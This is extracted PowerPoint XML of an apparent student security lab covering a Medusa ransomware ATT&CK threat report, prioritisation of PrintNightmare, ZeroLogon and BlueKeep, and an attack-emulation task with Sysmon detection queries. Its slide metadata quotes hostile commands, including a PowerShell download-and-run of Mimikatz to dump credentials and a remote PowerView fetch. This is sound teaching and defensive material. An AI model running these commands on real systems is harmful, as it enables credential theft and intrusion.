            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1"/>
              <a:t>spearphishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t> emails with malicious attachments to gain initial access to target systems. [Reference: MITRE]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" b="1" dirty="0"/>
              <a:t>2. Command and Scripting Interpreter: PowerShell (T1059.001)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employs PowerShell scripts to execute malicious commands and facilitate lateral movement within a network.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="387203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ACC0-0839-5BC3-C36E-0D2F1B51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151410" cy="365126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Threat Intelligence Report - Part 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ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0AE2-11CF-3170-340C-7159E918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b="1" dirty="0"/>
              <a:t>Software Name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1"/>
              <a:t>MedusaLocker</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" b="1" dirty="0"/>
              <a:t>Group Association: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>Medusa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" b="1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is ransomware used by the Medusa group to encrypt data and demand ransom payments for decryption keys.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" b="1" dirty="0"/>
              <a:t>Platform: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" b="1" dirty="0"/>
              <a:t>Techniques:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>1. Boot or Logon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1"/>
              <a:t>Autostart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t> Execution: Registry Run Keys / Startup Folder (T1547.001)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adds registry run keys to ensure the ransomware starts upon system boot.[Reference: MITRE ]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>2. File and Directory Discovery (T1083)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performs file and directory discovery to locate files for encryption. [Reference: Sophos]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FCB4-67E6-FB04-4715-FD9DDF5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7A5C-CC42-E0D1-FD5E-2575C948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4F9E-AF60-A3CC-71A8-963123CA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BC8DE-2FC5-D561-AFCF-9C256D6D77DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508650" y="1020369"/>
            <a:ext cx="5292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NZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>Title: Medusa Threat Intelligence Report (Cont'd)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7DB95-1C73-AC5A-CC92-EDFA025B900F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566168" y="190106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/>
              <a:t>3. Valid Accounts: Local Accounts (T1078.003)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uses stolen or compromised local accounts to maintain persistence and escalate privileges.[Reference: CISA]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" b="1" dirty="0"/>
              <a:t>4.File and Directory Discovery (T1083)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Medusa conducts file and directory discovery to identify critical files and directories to encrypt.[Reference: Sophos]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" b="1" dirty="0"/>
              <a:t>5.Data Encrypted for Impact (T1486)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encrypts data on target systems to disrupt operations and coerce ransom payments.[Reference: Kaspersky]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5397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DF2D-5E17-1D37-53D4-59314047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334290" cy="454151"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0"/>
              <a:t>Rationale for Technique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91DA-D248-BA83-F9FB-7A493D99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99805"/>
            <a:ext cx="937512" cy="148335"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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A5C9-3F95-46B7-C121-3F9471FA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055E-2514-97C4-B70F-5D124C89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72461"/>
            <a:ext cx="65053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CB5D-5D0E-D3BE-4E72-86668E16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376CF-1F99-29AF-31E7-199100414B5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508650" y="1391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Title: Rationale for Selected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0AC9F-9047-884B-EDC1-97F4E3D7BF46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="517870" y="1696920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/>
              <a:t>Content:</a:t>
            </a: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Phishing: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1"/>
              <a:t>Spearphishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t> Attachment (T1566.001)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Effective initial access method, widely used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>2. Command and Scripting Interpreter: PowerShell (T1059.001)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Versatile tool for executing commands and scripts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>3. Valid Accounts: Local Accounts (T1078.003)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Allows persistent access and privilege escalation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>4. File and Directory Discovery (T1083)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Essential for locating valuable data to encrypt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>5. Data Encrypted for Impact (T1486)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Directly impacts operations, increases likelihood of ransom payment.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="75311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3970-DE76-A45E-6480-DC89096B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757952"/>
            <a:ext cx="4745010" cy="474472"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0"/>
              <a:t>CVE-2021-34527 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0" err="1"/>
              <a:t>PrintNightmare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2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9598-A597-FE1D-725A-8F5D848B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C2C2-27FF-322E-86E7-AF868C0D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C1BD-6232-7A2D-8323-F8E74DDF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B77E-756D-305B-D575-0D24E4F6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53963-C2A6-70E1-BF9F-8FCD1631A24F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="517870" y="123242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/>
              <a:t>Content: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 dirty="0"/>
              <a:t>CWE: CWE-269, CWE-306, CWE-287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 dirty="0"/>
              <a:t>CAPEC: CAPEC-111 (Abuse Elevation Control Mechanism), CAPEC-93 (Command and Scripting Interpreter), CAPEC-272 (Valid Accounts)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 dirty="0"/>
              <a:t>ATT&amp;CK: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T1548.002: Abuse Elevation Control Mechanism (Used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T1059.001: Command and Scripting Interpreter: PowerShell (Used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T1078: Valid Accounts (Used by Medusa)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NZ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 dirty="0"/>
              <a:t>Action: Take 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 dirty="0"/>
              <a:t>Rationale: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1"/>
              <a:t>PrintNightmare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t> allows remote code execution and privilege escalation, both critical vulnerabilities. Medusa uses related techniques, making it likely they would exploit this CVE.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>Reference: Microsoft</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28782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ECD-5D70-CA6B-AEE7-0B2D9101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37108"/>
            <a:ext cx="5021182" cy="464311"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0"/>
              <a:t>CVE-2020-1472 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0" err="1"/>
              <a:t>ZeroLogon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2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EFF6-5FB4-DC18-9EE4-7DA9B92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2C40-9F10-0E89-9897-93644AFA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0418-2D28-F493-93A2-3372F71D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A1C6-C62D-4A32-BA7C-9D703704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9133C-A8A6-1698-45AA-45F96E7394FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508650" y="1195322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CWE: CWE-287, CWE-345, CWE-362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CAPEC: CAPEC-272 (Valid Accounts), CAPEC-220 (Exploitation of Remote Services), CAPEC-212 (Impair Defenses)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ATT&amp;CK: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T1078: Valid Accounts (Used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T1210: Exploitation of Remote Services (Not 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T1562.001: Impair Defenses: Disable or Modify Tools (Not used by Medusa)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Action: Take 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Rationale: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ZeroLogon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can bypass authentication to gain admin access. Medusa’s usage of valid accounts techniques suggests they might exploit this CVE.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reference: CISA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588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2B68-5C3B-AD99-6F9F-53E73428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721868"/>
            <a:ext cx="5456210" cy="494791"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0"/>
              <a:t>CVE-2019-0708 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0" err="1"/>
              <a:t>BlueKeep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2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4A28-0C95-129A-745C-46E3E63E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E7F3-7DCF-0FCA-B173-1A41EFD6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05C2-3651-EFEC-04B5-D0EEA194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F0A6-3C26-D60E-3F28-6C82910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889F5-300C-FD9F-4F7F-FB972DDAF1BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508650" y="114088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CWE: CWE-787, CWE-400, CWE-415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CAPEC: CAPEC-76 (Remote Service Exploitation), CAPEC-111 (Command Execution via PowerShell), CAPEC-192 (Indicator Removal)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ATT&amp;CK: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T1210: Exploitation of Remote Services (Not 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T1059.001: Command and Scripting Interpreter: PowerShell (Used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T1070.004: Indicator Removal on Host: File Deletion (Not used by Medusa)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Action: Ignore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Rationale: While </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BlueKeep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is serious, it primarily targets remote services, which Medusa does not exploit extensively. Only one relevant ATT&amp;CK code aligns with their methods.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reference: Microsoft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158169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119B9A7A9E194EA7C3CDC666436BFF" ma:contentTypeVersion="6" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="635cca14c17762850e6be0d8c22f8121">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="3cba80fa-c8b4-4e68-b060-6471eb82292c" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="fb4932751bda4941756e9b9cbbfd4b73" ns3:_="">
    <xsd:import namespace="3cba80fa-c8b4-4e68-b060-6471eb8229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a80fa-c8b4-4e68-b060-6471eb822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ba80fa-c8b4-4e68-b060-6471eb82292c" xsi:nil="true"/>
  </documentManagement>
</p:properties>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{38215930-A570-428D-BF2E-2B423EB05E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ba80fa-c8b4-4e68-b060-6471eb8229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60C45C-31EF-4AFA-8D5F-E91CF91B9C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EBF22-D0C8-434F-889E-B3B11C7BE898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cba80fa-c8b4-4e68-b060-6471eb82292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1676</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen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Bierstadt</vt:lpstr>
      <vt:lpstr>Neue Haas Grotesk Text Pro</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>GestaltVTI</vt:lpstr>
      <vt:lpstr>Peer Programming: Attack</vt:lpstr>
      <vt:lpstr>Task 1:</vt:lpstr>
      <vt:lpstr>Task 2: MedusaLocker Ransomware and Medusa Threat Actor: An ATT&amp;CK Threat Intelligence Report </vt:lpstr>
      <vt:lpstr>Threat Intelligence Report - Part 1</vt:lpstr>
      <vt:lpstr>Threat Intelligence Report - Part 2</vt:lpstr>
      <vt:lpstr>Rationale for Technique Choices</vt:lpstr>
      <vt:lpstr>CVE-2021-34527 (PrintNightmare)</vt:lpstr>
      <vt:lpstr>CVE-2020-1472 (ZeroLogon)</vt:lpstr>
      <vt:lpstr>CVE-2019-0708 (BlueKeep)</vt:lpstr>
      <vt:lpstr>Task 3:Prioritise the Vulnerabilities for the Organization  CVE-2021-34527 (PrintNightmare) Action: Take Action Rationale: PrintNightmare allows remote code execution and privilege escalation, both critical vulnerabilities. Medusa uses related techniques, making it likely they would exploit this CVE.</vt:lpstr>
      <vt:lpstr>CVE-2020-1472 (ZeroLogon)  Action: Take Action Rationale: ZeroLogon can bypass authentication to gain admin access. Medusa’s usage of valid accounts techniques suggests they might exploit this CVE.</vt:lpstr>
      <vt:lpstr>CVE-2019-0708 (BlueKeep)</vt:lpstr>
      <vt:lpstr>Task 4: Emulating an attack</vt:lpstr>
      <vt:lpstr>ATT&amp;CK ID : T1021 Tactic: Remote Services [Remote Desktop Control]  The command to emulate a benign attack which tries to log into the computer using Remote Desktop Protocol (RDP) on PowerShell is:  PS C:\Users\vagrant&gt;  reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /d 0 /t REG_DWORD /f  (Source :  https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md)  For Sysmon Detection we use the following code:  Get-WinEvent *Sysmon* | where message -like *T1021* | select -first 1 | Format-List </vt:lpstr>
      <vt:lpstr>Screenshots of Attack</vt:lpstr>
      <vt:lpstr>ATT&amp;CK ID : T1059.001 Tactic: Execution [Command and Scripting Interpreter: Power Shell]  This attack abuses PowerShell commands and scripts for execution. The command to emulate a benign attack on PowerShell is:  PS C:\Users\vagrant&gt;  powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"  (Source :  https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md)  ( Note: During execution device’s antivirus software blocked the PowerShell to run the command )  For Sysmon Detection we use the following code:  Get-WinEvent *Sysmon* | where message -like *T1059.001* | select -first 1 | Format-List </vt:lpstr>
      <vt:lpstr>Screenshots of Attack</vt:lpstr>
      <vt:lpstr>ATT&amp;CK ID : T1018 Tactic: Discovery [Remote System Discovery]  This command lists other IP addresses, hostname, etc. to get access remotely . The command to emulate a benign attack on PowerShell is:  [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose  (Source :  https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md)  ( Note: During execution device’s antivirus software blocked this command from running due to malicious materials)  For Sysmon Detection we use the following code:  Get-WinEvent *Sysmon* | where message -like *T1018* | select -first 1 | Format-List</vt:lpstr>
      <vt:lpstr>Screenshots of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Programming: Attack</dc:title>
  <dc:creator>abishek dues</dc:creator>
  <cp:lastModifiedBy>Tanisha Mina Oishi</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-17T19:06:47Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-21T15:59:23Z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0x01010059119B9A7A9E194EA7C3CDC666436BFF</vt:lpwstr>
  </property>
</Properties>
</file>